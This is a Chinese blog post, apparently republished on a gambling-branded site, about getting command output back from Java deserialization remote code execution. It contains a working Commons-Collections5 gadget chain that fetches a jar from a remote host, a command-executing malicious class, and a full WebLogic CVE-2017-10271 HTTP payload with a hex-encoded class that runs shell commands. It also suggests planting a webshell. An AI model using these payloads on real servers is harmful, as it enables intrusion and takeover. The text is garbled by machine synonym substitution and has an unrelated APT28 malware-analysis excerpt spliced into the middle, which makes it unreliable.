java反序列化RCE回显研讨 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

java反序列化RCE回显研讨

申博_行业观察 申博 136次浏览 未收录 0个评论

总结一下罕见反序列化RCE回显几种体式格局以下:

  1. a).运用java.net.URLClassLoader类,长途加载自定义类(放在本身服务器上的jar包),能够自定义要领实行。
    b).在自定义类中,抛出非常,获得回显结果。
    eg:Jboss报错返回敕令实行结果。
  2. 应用defineClass加载byte[]返回Class对象,不消长途加载歹意类。
  3. 直接应用RCE将实行的敕令写入服务器文件中,再次接见获得实行敕令结果。

1、URLClassLoader加载长途歹意类,抛出非常回显

歹意类以下:

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.Socket;

public class R
{
    public R(String commond) throws Exception {
        reverseConn(commond);
    }

    public void reverseConn(String commond) throws Exception {

            //实行敕令
            Process proc = Runtime.getRuntime().exec(commond);
            BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
            StringBuffer sb = new StringBuffer();
            String line;
            while ((line = br.readLine()) != null)
            {
                sb.append(line).append("\n");
            }
            String result = sb.toString();
            Exception e=new Exception(result);
            throw e;
    }
}

将歹意类打成jar包,把jar包放在服务器上。

javac R.java //先编译成class文件
jar -cvf R.jar R.class //打成jar包

接纳Commons-Collections5 gadgets触发反序列化报错回显,运转以下代码:

package test;
import java.io.*;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
public class Test{
    public InvocationHandler getObject(final String command) throws Exception {
        // inert chain for setup
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[] { new ConstantTransformer(1) });
        // real chain for after setup
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(java.net.URLClassLoader.class),
                // getConstructor class.class classname
                new InvokerTransformer("getConstructor",
                        new Class[] { Class[].class },
                        new Object[] { new Class[] { java.net.URL[].class } }),

                new InvokerTransformer(
                        "newInstance",
                        new Class[] { Object[].class },
                        new Object[] { new Object[] { new java.net.URL[] { new java.net.URL(
                                "http://vpsip/R.jar") } } }),
                // loadClass String.class R
                new InvokerTransformer("loadClass",
                        new Class[] { String.class }, new Object[] { "R" }),
                // set the target reverse ip and port
                new InvokerTransformer("getConstructor",
                        new Class[] { Class[].class },
                        new Object[] { new Class[] { String.class } }),
                // invoke
                new InvokerTransformer("newInstance",
                        new Class[] { Object[].class },
                        new Object[] { new String[] { command } }),
                new ConstantTransformer(1) };
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        //this will generate a AnnotationInvocationHandler(Override.class,lazymap) invocationhandler
        InvocationHandler invo = (InvocationHandler) getFirstCtor(
                "sun.reflect.annotation.AnnotationInvocationHandler")
                .newInstance(Retention.class, lazyMap);
        //generate object which implements specifiy interface
        final Map mapProxy = Map.class.cast(Proxy.newProxyInstance(this
                .getClass().getClassLoader(), new Class[] { Map.class }, invo));

        final InvocationHandler handler = (InvocationHandler) getFirstCtor(
                "sun.reflect.annotation.AnnotationInvocationHandler")
                .newInstance(Retention.class, mapProxy);
        setFieldValue(transformerChain, "iTransformers", transformers);
        return handler;
    }
    public static Constructor<?> getFirstCtor(final String name)
            throws Exception {
        final Constructor<?> ctor = Class.forName(name)
                .getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        return ctor;
    }
    public static Field getField(final Class<?> clazz, final String fieldName)
            throws Exception {
        Field field = clazz.getDeclaredField(fieldName);
        if (field == null && clazz.getSuperclass() != null) {
            field = getField(clazz.getSuperclass(), fieldName);
        }
        field.setAccessible(true);
        return field;
    }
    public static void setFieldValue(final Object obj, final String fieldName,
                                     final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }
    public static void main(final String[] args) throws Exception {
        final Object objBefore = Test.class.newInstance()
                .getObject("ipconfig");
        //deserialize(serialize(objBefore));

        File f = new File("E:\\payloadsfinal.bin");
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
        out.writeObject(objBefore);
        out.flush();
        out.close();

        FileInputStream fis = new FileInputStream("E:\\payloadsfinal.bin");
        ObjectInputStream ois = new ObjectInputStream(fis);
        //规复对象
        ois.readObject();
        ois.close();
    }
}

敕令回显结果以下,jboss敕令回显就是这个道理:

2、 defineClass加载byte[]返回Class对象,应用容器内部response回显

研讨weblogicCVE-2017-10271回显时,从这里找到回显的poc,接下来看看这个POC怎样组织的
细致POC以下:

APT28分析之Seduploader样本分析

最近在研究APT攻击,我选择研究APT的方法通过一个APT组织入手,我选择的是APT28这个组织,APT28组织是一个与俄罗斯政府组织的高级攻击团伙,我将分析该组织的攻击样本、攻击方法、攻击目的来研究一个APT组织。本次分析的是该团伙使用的CVE-2015-1641漏洞样本,所有资料均来自互联网。 Seduploader恶意软件作为APT28的第一阶段后门使用,主要作用是用于侦察并下载第二阶段的木马。 主要的攻击方式交付这种木马: 1 鱼叉攻击(使用钓鱼邮件包含恶意的office文档) 2 水坑攻击(使用Sedkit漏洞工具包,主要包括flash跟IE的漏洞) 此木马的一些特点: 1 包含有Carberp开源木马的代码 2 此木马已经被编译的有Windows跟OS X版本 3 进行反分析已经不同版本多种连接C&C的方式 样本分析 文件的信息如下 文件名称 btecache.dll SHA-256 c2551c4e6521ac72982cb952503a2e6f016356e02ee31dea36c713141d4f3785 创建时间 2016-05-20 13:16:01 文件大小 51.0 KB (52,224 字节) 文件名称 svchost.dll SHA-256 69940a20ab9abb31a03fcefe6de92a16ed474bbdff3288498851afc12a834261 创建时间 2016-05-20 22:58:15 文件大小 32.5 KB (33,280 字节) 交付方式 这两个文件是通过社工邮件携带的恶意的rt

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5126

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string>
                </void>
                <void class="org.mozilla.classfile.DefiningClassLoader">
                    <void method="defineClass">
                        <string>com.supeream.exploits.XmlExp</string>
                        <object idref="cls"></object>
                        <void method="newInstance">
                            <void method="say" id="proc">
                                <string>dir</string>
                            </void>
                        </void>
                    </void>
                </void>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getServletOutputStream">
                                <void method="writeStream">
                                    <object idref="proc"></object>
                                </void>
                                <void method="flush"/>
                            </void>
                            <void method="getWriter"><void method="write"><string></string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

defineClass去加载com.supeream.exploits.XmlExp歹意类,歹意类代码已Hex编码了。复原一下XmlExp代码,先对歹意类代码解码->bytes[]->写入1.class.再用idea/jd-gui反编译。

package weblogic;

import org.mozilla.classfile.DefiningClassLoader;
import weblogic.jdbc.wrapper.Array;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Arrays;

import static weblogic.utils.Hex.hexValueOf;

public class hh {
    public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, InstantiationException, InvocationTargetException, IOException {
        System.out.println("hahah");
        byte[] bt = fromHexString2("0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034");
        File file = new File("1.class");
        FileOutputStream fos = new FileOutputStream(file);
        fos.write(bt);
        fos.close();
        //        System.out.println(Arrays.toString(bt));  byte
//        DefiningClassLoader cls = new DefiningClassLoader();
//        Class cl =cls.defineClass("com.supeream.exploits.XmlExp",bt);
//        System.out.println(cl);
//        System.out.println(cl.getMethods());//
//        Method m = cl.getMethod("say",String.class);
//        Object dir = m.invoke(cl.newInstance(), "calc");
    }
    public static byte[] fromHexString1(byte[] barray, int len) {
        int i = 0;
        if (barray[0] == 48 && (barray[1] == 120 || barray[1] == 88)) {
            i += 2;
            len -= 2;
        }

        int outlen = len / 2;
        byte[] out = new byte[outlen];

        for(int j = 0; j < outlen; ++j) {
            out[j] = (byte)(hexValueOf(barray[i++]) << 4 | hexValueOf(barray[i++]));
        }

        return out;
    }
    public static byte[] fromHexString2(String hexString) {
        byte[] bytes;
        try {
            bytes = hexString.getBytes("US-ASCII");
        } catch (UnsupportedEncodingException var4) {
            bytes = new byte[hexString.length()];

            for(int i = 0; i < bytes.length; ++i) {
                bytes[i] = (byte)hexString.charAt(i);
            }
        }
        System.out.println(bytes);
        return fromHexString1(bytes, bytes.length);
    }

}

拿到XmlExp类代码以下:

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//

package com.supeream.exploits;

import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;

public class XmlExp {
    public XmlExp() {
    }
    public InputStream say(String cmd) throws Exception {
        boolean isLinux = true;
        String osTyp = System.getProperty("os.name");
        if (osTyp != null && osTyp.toLowerCase().contains("win")) {
            isLinux = false;
        }
        List<String> cmds = new ArrayList();
        if (cmd.startsWith("$NO$")) {
            cmds.add(cmd.substring(4));
        } else if (isLinux) {
            cmds.add("/bin/bash");
            cmds.add("-c");
            cmds.add(cmd);
        } else {
            cmds.add("cmd.exe");
            cmds.add("/c");
            cmds.add(cmd);
        }
        ProcessBuilder processBuilder = new ProcessBuilder(cmds);
        processBuilder.redirectErrorStream(true);
        Process proc = processBuilder.start();
        return proc.getInputStream();
    }
}

最先认为回显的原因是报错回显的,现实上不是,而是用到weblogic内部回显类举行回显,这也算是个骚思绪了,这点是get到了。
剖析下POC组织历程:

传入歹意类hex编码id设置为cls交给weblogic.utils.Hex.fromHexString类转换为byte[]—–>org.mozilla.classfile.DefiningClassLoader类的defineClass要领传入com.supeream.exploits.XmlExp歹意类,经由过程newInstance要领实例化歹意类并挪用say要领,传入dir敕令id设置为proc交给weblogic内部回显类回显。现实对应代码以下操纵。

DefiningClassLoader cls = new DefiningClassLoader();
Class cl =cls.defineClass("com.supeream.exploits.XmlExp",bt);
Method m = cl.getMethod("say",String.class);
Object dir = m.invoke(cl.newInstance(), "calc");

末了将回显结果交给weblogic容器的response回显,这块poc组织能够跟踪下一般处置惩罚回显是甚么样的来组织。
在com.sun.beans.ObjectHandler下断,idref这里跟进lookup

idref对应id是proc

加载歹意要领的处所,实行了dir敕令,剩下就是拼接返回包,这里就不跟了

末了完成结果以下:

3、实行的敕令写入可接见的服务器文件

这里就看一下weblogic CVE-2017-10271 ,现实已能够向服务器写文件,痛快直接写个实行敕令webshell更轻易。

经由过程webshell实行敕令
java反序列化RCE回显研讨
另有甚么好的回显思绪,迎接列位师傅增补。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明java反序列化RCE回显研讨
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址